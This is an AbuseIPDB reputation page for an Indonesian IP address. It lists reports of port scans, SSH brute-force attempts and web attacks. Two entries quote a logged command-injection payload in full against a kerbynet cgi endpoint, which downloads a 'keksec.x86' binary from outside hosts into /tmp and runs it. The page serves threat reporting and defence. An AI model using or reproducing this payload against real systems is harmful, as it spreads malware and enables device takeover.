AbuseIPDB » 202.72.211.213

202.72.211.213 was found in our database!

This IP was reported 62 times. Confidence of Abuse is 33%: ?

33%

ISP	PT Artha Telekomindo
Usage Type	Fixed Line ISP
Domain Name	scbd.net.id
Country	Indonesia
City	Jakarta, Jakarta Raya

IP info including ISP, Usage Type, and Location provided by IP2Location. Updated monthly.

Report 202.72.211.213

Whois 202.72.211.213

IP Abuse Reports for 202.72.211.213:

This IP address has been reported a total of 62 times from 17 distinct sources. 202.72.211.213 was first reported on November 21st 2020, and the most recent report was 2 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 2 weeks ago. It is possible that this IP is no longer involved in abusive activities.

Reporter	Date	Comment	Categories
ChillScanner	03 Jan 2021	<HUAWEI> TCP (SYN) 202.72.211.213:59308 -> port 2323, len 60	Port Scan
Anonymous	19 Dec 2020	2020-04-19T11:31:21.119037suse-nuc sshd[1648]: Invalid user fugazi from 202.72.211.213 port 22025<br ... show more2020-04-19T11:31:21.119037suse-nuc sshd[1648]: Invalid user fugazi from 202.72.211.213 port 22025 ... show less	Brute-Force SSH
Anonymous	29 Nov 2020	2020-04-19T11:31:21.119128-07:00 suse-nuc sshd[1648]: Invalid user fugazi from 202.72.211.213 port 2 ... show more2020-04-19T11:31:21.119128-07:00 suse-nuc sshd[1648]: Invalid user fugazi from 202.72.211.213 port 22025 ... show less	Brute-Force SSH
IrisFlower	28 Nov 2020	Unauthorized connection attempt detected from IP address 202.72.211.213 to port 23	Hacking
sdos.es	26 Nov 2020	"Remote Command Execution: Unix Command Injection - Matched Data: \x0a/etc/sudo found within ARGS:x5 ... show more"Remote Command Execution: Unix Command Injection - Matched Data: \x0a/etc/sudo found within ARGS:x509type: '\x0a/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=\x22wget h://198.144.190.5/bins/keksec.x86 -O /tmp/.keksec.x86;curl h://198.144.190.5/bins/keksec.x86 -O /tmp/.keksec.x86; chmod 777 /tmp/.keksec.x86; /tmp/.keksec.x86\x22\x0a'" show less	Web App Attack
IrisFlower	26 Nov 2020	Unauthorized connection attempt detected from IP address 202.72.211.213 to port 80	Hacking
Andi	26 Nov 2020	[H1.VM8] Blocked by UFW	Port Scan Brute-Force
Anonymous	25 Nov 2020	2020-11-25T11:24:47+01:00|202.72.211.213|GET|/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&Use ... show more2020-11-25T11:24:47+01:00|202.72.211.213|GET|/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http://107.174.133.119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://107.174.133.119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a'|?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http://107.174.133.119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://107.174.133.119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a' show less	Hacking
ChillScanner	25 Nov 2020	<WWW> TCP (SYN) 202.72.211.213:17636 -> port 80, len 44	Port Scan
IrisFlower	25 Nov 2020	Unauthorized connection attempt detected from IP address 202.72.211.213 to port 23	Hacking
ChillScanner	25 Nov 2020	<WWW> TCP (SYN) 202.72.211.213:16109 -> port 80, len 44	Port Scan
IrisFlower	25 Nov 2020	Unauthorized connection attempt detected from IP address 202.72.211.213 to port 23	Hacking
myintarweb	25 Nov 2020	202.72.211.213 - - [25/Nov/2020:08:59:25 +0000] 80 "POST /cgi-bin/ViewLog.asp HTTP/1.1" 405 860 "-" ... show more202.72.211.213 - - [25/Nov/2020:08:59:25 +0000] 80 "POST /cgi-bin/ViewLog.asp HTTP/1.1" 405 860 "-" "B4ckdoor-owned-you" ... show less	Hacking Bad Web Bot Web App Attack
ChillScanner	25 Nov 2020	<WWW> TCP (SYN) 202.72.211.213:21359 -> port 80, len 44	Port Scan
IrisFlower	25 Nov 2020	Unauthorized connection attempt detected from IP address 202.72.211.213 to port 80	Hacking

Is this your IP? You may request to takedown any associated reports. We will attempt to verify your ownership. Request Takedown 🚩